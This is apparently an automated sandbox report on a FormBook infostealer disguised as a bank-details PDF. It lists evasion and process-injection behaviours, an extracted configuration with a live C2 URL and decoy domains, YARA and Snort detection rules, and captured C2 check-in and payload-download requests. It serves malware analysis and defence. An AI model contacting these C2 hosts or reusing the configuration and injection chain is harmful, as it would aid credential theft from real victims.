Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BANK DETAILS-25012022-971332pdf.exe

Overview

General Information

Sample Name:BANK DETAILS-25012022-971332pdf.exe
Analysis ID:560342
MD5:a7f81ecd307166b18c038245a2005564
SHA1:f4218fa763a80a578afa156011b5e0ca4346d0e8
SHA256:376a0ec6b93ca5a330675d0dde65c0092b59fa92cf2341cf6d87ad7d62f7e55e
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious aspnet_compiler.exe Execution
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • BANK DETAILS-25012022-971332pdf.exe (PID: 6404 cmdline: "C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe" MD5: A7F81ECD307166B18C038245A2005564)
    • aspnet_compiler.exe (PID: 6724 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6152 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • WWAHost.exe (PID: 6068 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 6588 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.istemnetwork.com/be4o/"], "decoy": ["neonewway.club", "kuanghong.club", "7bkj.com", "ooo-club.com", "kamchatka-agency.com", "sjsndtvitzru.mobi", "noireimpactcollective.net", "justbe-event.com", "easypeasy.community", "southcoast.glass", "janhenningsen.com", "jmxyjj.com", "tarihibilet.com", "nagradi7.com", "percentrostered.net", "certvaxid.com", "kingseafoodsydney.com", "blacksheepwalk.com", "waktuk.com", "inteligenciaenrefrigeracion.com", "marvinhull.com", "fikretbayrakdar.com", "rsxrsh.com", "vastukalabid.com", "belindahulett.com", "aibet888.club", "icarus-groupe.com", "vendasdigitaisonline.com", "fairytalepageants.com", "imaginativeprint.com", "quanqiu55555.com", "owensigns.com", "kaikkistore.com", "dreamintelligent.com", "piqqekqqbpjpajbzvvfqapwr.store", "mariachinuevozacatecas24-7.com", "glenndcp.com", "vaughnediting.com", "10dian-3.com", "buresdx.com", "itservon.com", "buyingusedfurniture.com", "elektropanjur.com", "logotzo.com", "eaglesaviationexperience.com", "antoniopasciuti.com", "personas1web.com", "hvbatterystore.com", "ksustudyabroad.com", "4huav946.com", "gojajix.xyz", "kennycheng.tech", "traditionnevertrend.com", "mytrainermatrix.online", "basculasperu.com", "eljkj.com", "teleconstructiongroup.com", "28682df.com", "altimiravet.com", "worldplantaward.com", "mydxza.com", "josiemaran-supernatural.com", "brainymortgage.info", "diffamr.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.261658233.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000000.261658233.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.0.aspnet_compiler.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.0.aspnet_compiler.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.0.aspnet_compiler.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        5.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.aspnet_compiler.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries

          Sigma Overview

          System Summary

          barindex
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe" , ParentImage: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe, ParentProcessId: 6404, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 6724

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.istemnetwork.com/be4o/"], "decoy": ["neonewway.club", "kuanghong.club", "7bkj.com", "ooo-club.com", "kamchatka-agency.com", "sjsndtvitzru.mobi", "noireimpactcollective.net", "justbe-event.com", "easypeasy.community", "southcoast.glass", "janhenningsen.com", "jmxyjj.com", "tarihibilet.com", "nagradi7.com", "percentrostered.net", "certvaxid.com", "kingseafoodsydney.com", "blacksheepwalk.com", "waktuk.com", "inteligenciaenrefrigeracion.com", "marvinhull.com", "fikretbayrakdar.com", "rsxrsh.com", "vastukalabid.com", "belindahulett.com", "aibet888.club", "icarus-groupe.com", "vendasdigitaisonline.com", "fairytalepageants.com", "imaginativeprint.com", "quanqiu55555.com", "owensigns.com", "kaikkistore.com", "dreamintelligent.com", "piqqekqqbpjpajbzvvfqapwr.store", "mariachinuevozacatecas24-7.com", "glenndcp.com", "vaughnediting.com", "10dian-3.com", "buresdx.com", "itservon.com", "buyingusedfurniture.com", "elektropanjur.com", "logotzo.com", "eaglesaviationexperience.com", "antoniopasciuti.com", "personas1web.com", "hvbatterystore.com", "ksustudyabroad.com", "4huav946.com", "gojajix.xyz", "kennycheng.tech", "traditionnevertrend.com", "mytrainermatrix.online", "basculasperu.com", "eljkj.com", "teleconstructiongroup.com", "28682df.com", "altimiravet.com", "worldplantaward.com", "mydxza.com", "josiemaran-supernatural.com", "brainymortgage.info", "diffamr.net"]}
          Multi AV Scanner detection for submitted file
          Source: BANK DETAILS-25012022-971332pdf.exeVirustotal: Detection: 50%Perma Link
          Source: BANK DETAILS-25012022-971332pdf.exeReversingLabs: Detection: 20%
          Yara detected FormBook
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.261658233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266042035.0000000013054000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.261402302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.517033082.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.311832941.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.342122402.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.517249365.0000000002870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.297806322.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.istemnetwork.com/be4o/Avira URL Cloud: Label: malware
          Source: http://www.vaughnediting.com/be4o/?M0Gdwp1p=o5nWsVakMWYc7w6fw0YZzD6T98nAnbLK/jyfa2gYanpMFXzyxGBpmDpbEk08JIgv5yuWiK9Rzg==&xN9=9rHpFJex8Avira URL Cloud: Label: malware
          Source: http://www.waktuk.com/be4o/?M0Gdwp1p=ZACv9Iyh0rPZy/9/g0wPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPV5sctPCm8P82V3qxg==&xN9=9rHpFJex8Avira URL Cloud: Label: malware
          Source: 5.2.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.aspnet_compiler.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.aspnet_compiler.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance

          barindex
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeUnpacked PE file: 1.2.BANK DETAILS-25012022-971332pdf.exe.cc0000.0.unpack
          Source: BANK DETAILS-25012022-971332pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.7:49756 version: TLS 1.0
          Source: BANK DETAILS-25012022-971332pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: c:\Users\VICTOR\source\repos\VXCSGDFD\VXCSGDFD\obj\Debug\VXCSGDFD.pdb source: BANK DETAILS-25012022-971332pdf.exe
          Source: Binary string: c:\Users\VICTOR\source\repos\VXCSGDFD\VXCSGDFD\obj\Debug\VXCSGDFD.pdb|E source: BANK DETAILS-25012022-971332pdf.exe
          Source: Binary string: ????????????.pdb source: BANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.262683750.0000000001180000.00000004.08000000.00040000.00000000.sdmp, BANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.263299926.00000000030E3000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: WWAHost.pdb source: aspnet_compiler.exe, 00000005.00000002.343223890.00000000036E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: aspnet_compiler.exe, 00000005.00000002.343223890.00000000036E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000005.00000002.342710384.000000000197F000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000005.00000002.342710384.000000000197F000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: aspnet_compiler.pdb source: WWAHost.exe, 00000010.00000002.518661760.0000000003C27000.00000004.10000000.00040000.00000000.sdmp

          Networking

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49829 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49829 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49829 -> 192.0.78.25:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.quanqiu55555.com
          Source: C:\Windows\explorer.exeDomain query: www.waktuk.com
          Source: C:\Windows\explorer.exeDomain query: www.piqqekqqbpjpajbzvvfqapwr.store
          Source: C:\Windows\explorer.exeDomain query: www.kuanghong.club
          Source: C:\Windows\explorer.exeDomain query: www.istemnetwork.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.98 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 38.143.0.82 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.janhenningsen.com
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.184.243 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.vaughnediting.com
          Source: C:\Windows\explorer.exeNetwork Connect: 95.179.246.125 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.kamchatka-agency.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.istemnetwork.com/be4o/
          Source: Joe Sandbox ViewASN Name: GIGSGIGSCLOUD-AS-APGigsGigsNetworkServicesHK GIGSGIGSCLOUD-AS-APGigsGigsNetworkServicesHK
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: global trafficHTTP traffic detected: GET /get/AeJsG7/RAM.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /get/y4hP6y/DLLLLLLLL.txt HTTP/1.1Host: transfer.sh
          Source: global trafficHTTP traffic detected: GET /be4o/?M0Gdwp1p=ZACv9Iyh0rPZy/9/g0wPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPV5sctPCm8P82V3qxg==&xN9=9rHpFJex8 HTTP/1.1Host: www.waktuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /be4o/?M0Gdwp1p=MXCJfAinsdUT0nhhknsrtNqd5bs2JuRcGlYNxDXnDFPSUKLWpR3/CyWyuF+1kPk8mbaZ3X+7FQ==&xN9=9rHpFJex8 HTTP/1.1Host: www.janhenningsen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /be4o/?M0Gdwp1p=yMGLhnybay5mZd/ZPFkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsijaPEOonxtzUinVLZQ==&xN9=9rHpFJex8 HTTP/1.1Host: www.quanqiu55555.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /be4o/?M0Gdwp1p=o5nWsVakMWYc7w6fw0YZzD6T98nAnbLK/jyfa2gYanpMFXzyxGBpmDpbEk08JIgv5yuWiK9Rzg==&xN9=9rHpFJex8 HTTP/1.1Host: www.vaughnediting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /be4o/?M0Gdwp1p=wIp58s40YrNhfdMAFv4rqgUp5u7iL+N7b95EvKIF+kbWJuwkW3uIXI2lc43g/pQXJxrFJYwWsw==&xN9=9rHpFJex8 HTTP/1.1Host: www.kamchatka-agency.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
          Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.7:49756 version: TLS 1.0
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Wed, 26 Jan 2022 10:59:08 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Jan 2022 10:59:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 31 64 32 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 